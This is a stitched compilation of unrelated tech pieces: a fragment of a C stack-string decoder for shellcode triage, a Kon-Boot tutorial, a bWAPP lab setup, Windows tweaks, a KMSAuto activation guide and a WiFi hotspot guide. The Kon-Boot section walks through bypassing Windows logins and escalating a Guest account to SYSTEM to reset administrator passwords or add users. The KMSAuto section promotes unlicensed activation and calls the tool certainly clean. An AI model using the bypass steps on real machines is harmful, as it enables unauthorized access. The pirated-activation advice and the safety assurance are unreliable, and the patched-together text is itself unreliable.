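            patch_disp = code[i + 3];
            i += 4;
            continue;
        }
        if (k >= 2 && found < max_out)           /* any other byte closes the run */
            lay_out_run(imm, k, patch_push, patch_disp, out[found++]);
        k = 0; patch_push = -1; patch_disp = 0;
        i++;
    }
    if (k >= 2 && found < max_out)
        lay_out_run(imm, k, patch_push, patch_disp, out[found++]);
    return found;
}

/* Constructed sample: bytes copied from the disassembly above, covering the
 * "OpenProcessToken" run (push eax, four pushes) and the "GetCurrentProcess" run
 * (push, terminator patch at [esp+1], four pushes), with the code in between intact. */
static const uint8_t SAMPLE_CODE[] = {
    0x50,
    0x68,0x6f,0x6b,0x65,0x6e, 0x68,0x65,0x73,0x73,0x54,
    0x68,0x50,0x72,0x6f,0x63, 0x68,0x4f,0x70,0x65,0x6e,
    0x8d,0x04,0x24, 0x50, 0x51, 0xff,0xd2, 0x89,0x46,0x04, 0x83,0xc4,0x10, 0x31,0xc9,
    0x68,0x73,0x41,0x42,0x42, 0x88,0x4c,0x24,0x01,
    0x68,0x6f,0x63,0x65,0x73, 0x68,0x6e,0x74,0x50,0x72,
    0x68,0x75,0x72,0x72,0x65, 0x68,0x47,0x65,0x74,0x43,
    0x8d,0x0c,0x24
};

int main(void)
{
    char out[8][STR_MAX];
    size_t i, n = decode_push_strings(SAMPLE_CODE, sizeof SAMPLE_CODE, out, 8);
    for (i = 0; i < n; i++)
        printf("stack string %zu: \"%s\"\n", i, out[i]);
    return 0;
}
```

Run against the full byte array from the runner above, the same scanner recovers every import name and the shutdown message, which is also why this idiom is easy to spot in static triage: a long run of `68 xx xx xx xx` whose immediates are all printable is a strong indicator of stack-built strings.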

 

Use Kon-Boot to Login to Windows Without Knowing or Changing the Current Password

One of the most obvious and easiest ways to add another layer of protection to your computer is protecting your account with a password. It’s easy enough to do and you can either supply a new password during install, on first run of your new computer or later on through User Accounts in Control Panel. Although not quite as important on a single user machine, passwords are essential when multiple users have access to the same computer or when trying to lock down your child’s user account with parental controls etc.

One of the most common and also frustrating problems you’ll encounter when attempting to troubleshoot or repair a computer is that either the user has forgotten or doesn’t know the logon password, or they’re not available to give you that important piece of information. Knowledgeable users will know this actually isn’t as big a problem as it seems and there are various ways to get around a Windows logon password without knowing what it is.

incorrect password during login

For example, if no-one knows or remembers it, the password can be removed from the user account and reset by using a utility from a boot CD. If you want to find out what the password is without resetting it first, you can try to crack it with a tool such as Ophcrack. A few years back we also wrote about a program called DreamPack PL where you can hack into a Windows XP computer without changing the password. Each method has its plus and minus points, but there’s also another way to login to a computer where you don’t actually make any permanent changes to the computer or need to reset/remove the password at all.

Kon-Boot is one of the best tools around which can log you into Windows without knowing the password. It works by hooking into the system BIOS and temporarily changing the contents of the Windows kernel while booting. It then allows you to enter anything as the password during login. The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened. Kon-Boot has been around a while and updates have brought new features such as privilege escalation and the sticky keys workaround while adding compatibility for more recent operating systems such as Windows 8, 64-bit architecture and UEFI support. The program is split into 2 distinct versions: Kon-Boot free version 1.1 and the paid version (currently 2.2), which has newer features.

Kon-Boot Free Version

Because the last free version of Kon-Boot is 1.1, it lacks some features found in subsequent versions and is a bit limited regarding which Windows operating systems it can work with. For instance, it does not work with any type of 64-bit Windows and is also not compatible with any versions of Windows 8. There is some good news, however: the website lists Windows 7 as not compatible either, but we’ve tested extensively and used Kon-Boot on several occasions without issue in any 32-bit version of Windows 7. XP, Vista and Server 2003/2008 are officially supported.

Using Kon-Boot free is easy and you just burn the downloaded ISO file to CD. There is also the possibility to write the image onto a USB flash drive although you don’t use the ISO file to do it. We have covered this procedure in our “Create a Kon-Boot USB Flash Drive” article. Alternatively, if you want a bit more value out of your CD/USB, Kon-Boot is available on the main menu in more recent versions of our favorite bootable repair disc Hiren’s Boot CD.

booting Kon-Boot 1.1

After you download Kon-Boot and write it onto CD or USB, simply boot your computer to that device (you will need to set the boot device in the BIOS) and a white screen will pop up. Press any key and a black screen will pop up showing the process of hooking BIOS functions (the version number 1.0 appears to be an oversight by the developer). After a few more seconds the computer will start to boot normally.

Now when the Logon to Windows screen appears, simply type anything in the password box or leave the password field blank and you’re in! It really is that easy and you simply remove the USB drive or disc so on next reboot Kon-Boot won’t bypass the password again. It is known that not every computer’s BIOS will allow Kon-Boot to work but the majority will be fine if the operating system is compatible.

Kon-Boot Commercial Version

As the free version of Kon-Boot slowly becomes less useful over time because users are moving to 64-bit operating systems or Windows 8, looking at the commercial version is something that begins to make more sense. Currently a personal license for your own use is $15 and for businesses or budding technicians, a commercial license is required at $75. Kon-Boot is now also available for Mac OS X (same price as the Windows version) which allows you to bypass the password or create a new root account to change other users’ passwords.

Kon-boot 2.2 starting up

Besides the 64-bit support and compatibility with Windows 8 (when tested, Windows 8.1 did not work with Kon-Boot 2.2), the commercial version also has better support for systems with a UEFI BIOS when you run Kon-Boot from USB flash drive. If you have a UEFI BIOS, make sure the “Secure Boot” option inside the BIOS is turned off. Kon-Boot is known to not work on domain controllers and it also can’t get past hard drive encryption. In the full Kon-Boot package is a simple installer frontend which gives the options of writing the program to CD or USB (with UEFI support). The ImgBurn burning software is required to burn the ISO file to disc.

Kon-Boot installer utility

Bypassing a password is done the same way as the free version, boot with Kon-Boot and type anything for the password. Kon-Boot paid is also capable of performing privilege escalation which allows you to perform administrative tasks as a non administrative user or Guest. For example, you can boot up the computer with Kon-Boot, log in as a Guest and add a new user or even reset the administrator password! Here’s how it works:

1. Boot the computer with Kon-Boot and select to login as a Guest user or with your standard user account.

2. Open a Command Prompt (Win key+R -> cmd) and type these commands in turn:

copy c:\windows\system32\cmd.exe cmk.exe
cmk
whoami

If the whoami command result is “nt authority\system”, then you have elevated privileges and can run commands such as “net user”:

net user {admin} newpassword – resets the named admins password
net user /add {user} {password} – creates a new user with optional password

Kon-Boot Privilege Escalation

Another paid version feature is “Sticky keys” which is a type of escalation somewhat similar to the privilege escalation above, but this one allows you to open a Command Prompt with System administrator privileges before any users have logged on. The console window will show on the user selection or password entry screen and will allow you to execute similar commands to the desktop privilege escalation function.

privilege escalation using Kon-Boot sticky keys

To bring up the Command Prompt, all you have to do is boot your computer using Kon-Boot and when you reach user selection or password entry, simply tap the Shift key 5 times in quick succession. The new console window has “Administrator” in the title bar and a path of “C:\Windows\System32” which tells you this is an elevated command prompt. Do note that the Sticky Keys function needs to be enabled in Windows, and it should be on by default unless you have turned it off manually. Sticky Keys escalation also works in Windows XP but privilege escalation does not.

Although the free version of Kon-Boot is losing its effectiveness as time progresses and users move away from 32-bit Windows, it’s still a useful tool to have around while XP and 32-bit Vista/7 are still frequently used. It’s a shame Kon-Boot free will probably not receive any more major updates to make it more compatible with newer operating systems, but all good things come to an end eventually.

For pretty much the ultimate in Windows password bypassing that works on 32-bit, 64-bit and UEFI equipped computers, and does so quickly and easily without changing files, cracking or removing current passwords, the paid version of Kon-Boot is well worth looking at.


Web Pentest Lab Setup using bWAPP in Windows 10

bWAPP, or a buggy web application, is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Some of the vulnerabilities included in bWAPP:

  • SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
  • Blind SQL and Blind OS Command injection
  • Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
  • Cross-Site Request Forgery (CSRF)
  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
  • Malicious, unrestricted file uploads and backdoor files
  • Authentication, authorization and session management issues
  • Arbitrary file access and directory traversals
  • Local and remote file inclusions (LFI/RFI)
  • Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures
  • HTTP parameter pollution and HTTP response splitting
  • Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
  • Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
  • Unvalidated redirects and forwards, and cookie poisoning
  • Cookie poisoning and insecure cryptographic storage
  • Server Side Request Forgery (SSRF)
  • XML External Entity attacks (XXE)

Download WAMP server here. Select save or run. Click open. After that follow the next steps.

Next you will see the Select Destination Location screen. Click Next to continue.

Next you will see the Ready to install screen. Click Install to continue.

Once the files are extracted, you will be asked to select your default browser. Select your default browser’s .exe file, then click Open to continue.

Once the progress bar is completely green, the PHP Mail Parameters screen will appear. Leave the SMTP server as localhost, and change the email address to one of your choosing. Click Next to continue.

Download the latest version of bWAPP from here.

Extract the bWAPP lab setup into the location “C:\wamp\WWW\bWAPP” as shown below.

Edit the file ‘admin/settings.php’ with your own database connection settings. Leave the db_password and db_name options blank for now.

Browse to the file ‘install.php’ in the directory ‘bWAPP’:

http://localhost/bWAPP/install.php

Click on ‘here’ (Click ‘here’ to install bWAPP). The database ‘bWAPP’ will be created.

Edit the file ‘admin/settings.php’ again and set db_name; see the screenshot below.

Go to the login page. If you browse to the bWAPP root folder you will be redirected there: http://localhost/bWAPP/

Login with the default credentials or make a new user.

Default credentials:

User name: bee

Password: bug
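The two edits to ‘admin/settings.php’ described in the steps above, written out as an added example rather than the file bWAPP ships; the variable names ($db_server, $db_username, $db_password, $db_name) are assumed from bWAPP’s settings template, and the values match WAMP’s default root account, which has no password:

```php
<?php
// admin/settings.php (added example; variable names assumed from
// bWAPP's own settings template, values for a default WAMP install)

// Database connection settings used by every bWAPP page.
$db_server   = "localhost";
$db_username = "root";  // WAMP's default MySQL account
$db_password = "";      // WAMP's default root has no password; fine only
                        // on a lab box that is reachable from localhost

// Pass 1 (before running install.php): leave db_name empty so the
// installer can connect to the server and create the 'bWAPP' database.
$db_name = "";

// Pass 2 (after install.php reports the database was created): set
// db_name to the schema the installer made, then log in as bee / bug.
// $db_name = "bWAPP";
?>
```

After pass 2, reloading http://localhost/bWAPP/ should present the login page instead of a database error.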

Turn on Windows “God Mode” on the Desktop

Windows 8 has countless settings you can hack, tweak, and customize. Many of them are accessible via the Control Panel and other scattered locations throughout Windows. It can be time-consuming to find them all, and the likelihood is that you’ll never remember where they all live. That means that many tweaks and hacks are far away, and some you’ll never even find.
There’s a simple solution: Use what some people call “God Mode.” Despite its name, it’s not really a separate mode. Instead, it’s a hidden folder that gives you fast access to all those settings. All you have to do is bring it out of hiding and place it on the Desktop.
To do it, right-click the Desktop and select New→Folder (Figure 3-10). Rename the folder GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}.

[Screenshot: Creating a new folder on the desktop]
The folder icon changes, and it now has the name GodMode.

[Screenshot: The God Mode folder on the Desktop]
Note: The “GodMode.” text isn’t what turns the folder into a special folder; it’s the {ED7BA470-8E54-465E-825C-99712043E01C}. You can use any text you want before the curly brackets. So if you wanted the folder to be called Fred.Folder, you could do that as well by renaming it like this: Fred.Folder{ED7BA470-8E54-465E-825C-99712043E01C}. It would show up as FredFolder on the Desktop, but still have the same features.
Double-click the icon, and you’ll come to a folder that has many dozens of tweaks, settings, and hacks. They’re organized by category, and you can expand or shrink each category by clicking the small triangle next to it. Each category displays a number next to it, showing how many settings it contains.


Hacking the Hack
In the God Mode folder, you can create shortcuts to any of the items in the Quick Launch folder, in the Start Menu folder, and in the Power User Menu folder. That way they’re always within easy reach.


Speed Up Boot Time

Hack Your BIOS for Faster Startups
When you turn on your PC, it goes through a set of startup procedures in its BIOS before it gets around to starting Windows.

So, if you speed up those initial startup procedures, you’ll make your system start faster.
You can speed up your startup procedures by changing the BIOS with the built-in setup utility.

How you run this utility varies from PC to PC, but you typically get to it by pressing either the Delete, F1, F2, or F10 key during startup. You’ll come to a menu with a variety of choices.

Here are the choices to make for faster system startups:

  • Quick Power On Self Test (POST): When you choose this option, your system runs an abbreviated POST rather than the normal, lengthy one.
  • Change Your Boot Order: If you change the boot order so that your BIOS checks the hard disk first for booting, it won’t check any other devices, which speeds up your startup time.
  • Boot Up Floppy Seek: Disable this option. When it’s enabled, your system spends a few extra seconds looking for your floppy drive, a relatively pointless procedure, especially considering how infrequently you use your floppy drive.
  • Boot Delay: Some systems let you delay booting after you turn on your PC so that your hard drive gets a chance to start spinning before bootup. Most likely, you don’t need this boot delay, so turn it off. If you run into problems, however, you can turn it back on.

How to Remove “Activate Windows” Watermark on Desktop or Laptop

Easily Remove “Activate Windows” Watermark

Are you sick of the “Activate Windows” watermark on your desktop or laptop screen that just won’t go away unless you pay the full product price, which of course costs hundreds of dollars? Well, if you want to support Windows, you can simply pay the full amount. But for those who can’t, this tutorial is for you! It doesn’t matter whether you are using Windows 7, 8, 8.1 or Windows 10; we can easily remove the watermark on all of those versions.

Instructions

  • Download KMSAuto 2015 Portable Version
  • If you are worried about a virus, you can scan the file with your anti-virus to be sure. I am 100% sure it is clean, though.
  • Unzip file and open up KMSAuto Net.exe

Activate Windows 10 and remove watermark

  • Click on the activation button and you will see 2 options
    • Activate Windows and Activate Office
  • For this tutorial, we will use Activate Windows option
  • Click Activate Windows and wait for the process to finish

Activate Windows

  • There you have it. Product successfully activated! At this step, you should see the watermark disappear.
  • If you need your Microsoft Office activated as well, feel free to use the Activate Office option too!

Make Your Own WIFI HotSpot using Desktop/Laptop + Screenshots

Create Your Own WIFI HotSpot using Laptop or Desktop

You can now turn your Laptop or Desktop into a Wifi router and easily create unlimited hotspots! Share your existing wired/wireless internet connection with others by creating your own hotspot and assigning your own password to it. You can even ask them to pay if you want. Here’s how you can do it.

Why Use a WIFI Hotspot?

There are various reasons why you should use a WIFI Hotspot and some of them are as follows:

  • Problem 1: You have an internet connection and want to share it with others who do not have one. Then turn on your WIFI Hotspot.
  • Problem 2: You want to make money with your internet connection and want to create a password-protected WIFI Hotspot where users pay before they get access.

How to create a WIFI Hotspot using your Windows 10 Desktop or Laptop?

Follow the below instructions and be amazed at how easy they are to implement.

Method 1: Using the Feature of Windows 10 OS

Create a WIFI Hotspot on Windows 10

The easiest way to do this is by using Windows 10, since you do not need any third-party software to make your hotspot. However, you should install the latest updates for this version of Windows, since this feature was added in an update.

Step 1: Open the General Settings Window

Press the Windows button on your keyboard and click on the Settings “Gear” icon.

Open Settings Window

Step 2: Click on the Network & Internet Settings

Your updated Windows 10 should have this feature available, and it should not be hard to find. If you cannot find this feature, please update your Windows 10.

Click on the Network and Internet

Step 3: You can now set up your Wifi Hotspot

Click on the Mobile Hotspot and Tick “On”. Edit your Wifi name and password. You are now ready to publicize your WIFI hotspot to others. Please note that you can only add up to 8 devices to your Wifi network.

Windows 10 Wifi Hotspot Settings

On this version of Windows, everything is very easy to implement. Should you find some problems with this tutorial please comment below.

Method 2: Using Commercial Software

This method works on Windows 7, Windows 8, Windows 8.1 and Windows 10.

In this method, we are going to use commercial software that has tons of features if you want to get serious about commercializing your internet connection. Some of its important features are that you can add a limitation on each device connected to your WIFI Hotspot: for example, you can limit how long a device stays connected or how much bandwidth it may use.

Create a WIFI Hotspot using Connectify Hotspot

Step 1: First download Connectify Hotspot 2017

Click on the “Buy Now” button if you want to buy the full version of the software, or click on “Download” to instantly download the product and use the free version, with limitations of course. These limitations are not that important, however, since you can still make full use of the software.

Download Connectify Hotspot 2017

Step 2: Install and Open Connectify Hotspot 2017

You may need to reboot your PC to successfully install the software. After the installation, you are ready to use Connectify Hotspot 2017. Please note that since we are using the free version of the software, we cannot edit the WIFI name. You can still edit the WIFI password though. After that, you are ready to start your Hotspot connection.

Create a Wifi Hotspot using Connectify Hotspot 2017

Step 3: Check your Mobile for the Hotspot

Go to your mobile’s WIFI tab and check for the WIFI network you have just enabled.

Check for Additional WIFI Connection

Reminders: Note that you can only use the Hotspot you have created with either method while your PC is turned on.

So those were both methods I have used, and am currently using, to create a wifi hotspot at home and for the public. Feel free to share your own method by commenting below.